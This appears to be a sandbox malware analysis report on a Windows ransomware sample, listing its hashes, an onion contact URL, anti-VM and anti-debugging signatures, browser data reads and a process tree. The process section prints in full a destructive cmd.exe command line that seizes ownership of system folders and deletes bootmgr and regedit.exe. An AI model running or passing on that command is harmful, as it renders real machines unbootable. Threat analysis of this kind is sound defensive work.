Analysis
- max time kernel: 140s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 06-11-2024 02:26
Behavioral task
- behavioral1
- Sample: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Resource: win7-20240903-en
General
- Target: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Size: 3.1MB
- MD5: 6a85d0ba4d1db63d390b7a071d60e0ef
- SHA1: 79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
- SHA256: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
- SHA512: 16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
- SSDEEP: 49152:uZik4UvxXDFSuvXKWC9BKtKkd1UOe65qeVyODIaihosmrcvCM97Wd84T3D:YGuDppmT+Be6bymIhoBcaY6d84jD
Malware Config
- Extracted from: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT
- URL: http://mail2tor2zyjdctd.onion/
Signatures
- Identifies VirtualBox via ACPI registry values (likely anti-VM) [2 TTPs, 1 IoC]
  Processes:
    Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
- Renames multiple (196) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.
- Disables Task Manager via registry modification
- Possible privilege escalation attempt [5 IoCs]
  Processes: 2148 takeown.exe, 2284 icacls.exe, 604 takeown.exe, 2928 takeown.exe, 892 icacls.exe
- Checks BIOS information in registry [2 TTPs, 2 IoCs]
  BIOS information is often read in order to detect sandboxing environments.
  Processes:
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
- Modifies file permissions [1 TTP, 5 IoCs]
  Processes: 604 takeown.exe, 2928 takeown.exe, 892 icacls.exe, 2148 takeown.exe, 2284 icacls.exe
- Reads user/profile data of web browsers [3 TTPs]
  Infostealers often target stored browser data, which can include saved credentials etc.
- YARA rule match: themida
  Resources:
    behavioral1/memory/2084-19-0x0000000001120000-0x0000000001950000-memory.dmp
    behavioral1/memory/2084-20-0x0000000001120000-0x0000000001950000-memory.dmp
- Checks whether UAC is enabled
  Processes:
    Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
- Suspicious use of NtSetInformationThreadHideFromDebugger [1 IoC]
  Processes: 2084 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Enumerates physical storage devices [1 TTP]
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery [1 TTP, 7 IoCs]
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes:
    Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe, cmd.exe, takeown.exe, icacls.exe, takeown.exe, icacls.exe, takeown.exe
- Suspicious use of AdjustPrivilegeToken [5 IoCs]
  Processes:
    Token: SeDebugPrivilege (2084 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe, recorded twice)
    Token: SeTakeOwnershipPrivilege (2928 takeown.exe; 2148 takeown.exe; 604 takeown.exe)
- Suspicious use of WriteProcessMemory [24 IoCs]
  Processes (each write recorded four times):
    PID 2084 (369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe) wrote to memory of PID 316 (cmd.exe)
    PID 316 (cmd.exe) wrote to memory of PID 2928 (takeown.exe)
    PID 316 (cmd.exe) wrote to memory of PID 892 (icacls.exe)
    PID 316 (cmd.exe) wrote to memory of PID 2148 (takeown.exe)
    PID 316 (cmd.exe) wrote to memory of PID 2284 (icacls.exe)
    PID 316 (cmd.exe) wrote to memory of PID 604 (takeown.exe)
Processes
- C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe (PID 2084, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"
  Signatures:
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 316, depth 2, child of 2084)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
    Signatures:
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\takeown.exe (PID 2928, depth 3, child of 316)
      Command line: takeown /f C:\Windows\System32
      Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\icacls.exe (PID 892, depth 3, child of 316)
      Command line: icacls C:\Windows\System32 /grant Admin:F
      Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\takeown.exe (PID 2148, depth 3, child of 316)
      Command line: takeown /f C:\Windows\System32\drivers
      Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\icacls.exe (PID 2284, depth 3, child of 316)
      Command line: icacls C:\Windows\System32\drivers /grant Admin:F
      Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\takeown.exe (PID 604, depth 3, child of 316)
      Command line: takeown /f C:\Windows\System32\LogonUI.exe
      Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
- Defense Evasion
  - File and Directory Permissions Modification (1)
  - Virtualization/Sandbox Evasion (1)
- Credential Access
  - Credentials from Password Stores (1)
    - Credentials from Web Browsers (1)
  - Unsecured Credentials (1)
    - Credentials In Files (1)
Downloads